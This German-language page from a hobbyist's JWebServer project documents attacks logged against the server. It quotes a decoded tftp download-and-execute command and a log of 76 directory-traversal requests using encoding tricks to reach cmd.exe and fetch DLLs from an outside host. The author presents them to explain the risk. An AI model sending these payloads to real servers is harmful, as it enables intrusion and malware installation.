<< Attacken & Spionage [43/117] >>

Attacken & Spionage


Startseite / Projekte / JWebServer / Attacken & Spionage

Attacken & Spionage



Beim längeren Betrieb des JWebServers erhalte ich öfters verschiedene Attacken und Spionage-Versuche.

tftp-Attacke:
Diese Attacke erhalte ich im Schnitt etwa jede Stunde:
GET / HTTP/1.0
Host: xxx.xxx.xxx.xxx
Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCE...
Entschlüsselt man die Zeichenfolge nach "Negotiate" (etwa 6KB groß) nach dem Base64-Verfahren so enthält diese Zeichenfolge z.B. folgenden String:
cmd /c tftp -i 172.179.185.131 GET NPFMONTR.exe&start NPFMONTR.exe&exit
Die IP und der Name der EXE-Datei variieren dabei ständig (z.B.: ms-wks32.exe, cgy32win.exe). Der Download mittels tftp ist nur innerhalb von 3 Minuten nach der GET-Anfrage möglich, danach bekommt man ein Timeout. Die EXE-Dateien sind mittels PolyCrypt von JLabSoftware (http://jlabsoftware.com/) verschlüsselt.
Bei Ausführung dieser Zeichenfolge (z.B. im DOS) wird "NPFMONTR.exe" per tftp-Programm (Trivial File Transfer Protocol) heruntergeladen und anschließend ausgeführt. Ich glaube nicht, dass diese Ausführung im Interesse des Servers liegt.
Soweit ich recherchieren konnte gibt es da eine Sicherheitslücke im Microsoft-Server. Mir ist aber dennoch fragwürdig, warum ein Server eine solche Zeichenfolge überhaupt ausführen sollte.

Spionage/Attacke:
Ein Spionage-Angriff versuchte folgende Anfragen. Als "Host:" wurde immer "www" übermittelt, und der "Connection:"-Parameter war immer "close". Innerhalb einer Zeitspanne von 50 Sekunden bekam ich folgende 76 Anfragen (d.h. schneller als im Sekundentakt!):
- GET /scripts/root.exe?/c+dir HTTP/1.0
- GET /scripts/root.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20httpodbc.dll HTTP/1.0
- GET /scripts/httpodbc.dll HTTP/1.0
- GET /MSADC/root.exe?/c+dir HTTP/1.0
- GET /MSADC/root.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20httpodbc.dll HTTP/1.0
- GET /MSADC/httpodbc.dll HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0 
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /c/httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /d/httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../httpodbc.dll HTTP/1.0
Im Allgemeinen wird also versucht z.B. über ein "scripts/"-Verzeichnis und dem Rückwärtsoperator "../" auf Vorgängerverzeichnisse zuzugreifen. Würde man also z.B. in Java einfach nur ein File-Objekt aus der GET-Anfrage bilden und diese Datei dann an den Client übermitteln, so hätte dieser Spionage-Versuch zumindest teilweise Erfolg!
Auch wird versucht verschiedene DOS-Befehle (tftp, dir, cmd.exe, root.exe, etc.) auszuführen und bestimmte dll-Dateien per tftp-Befehl zu überschreiben.


Visitors PageClicks Valid XHTML 1.0! Valid CSS!

CanciÜber michSite-MapRechtlichesKontaktJSWins (JavaScript-Desktop-System)© 2004-2013 by Markus Krebs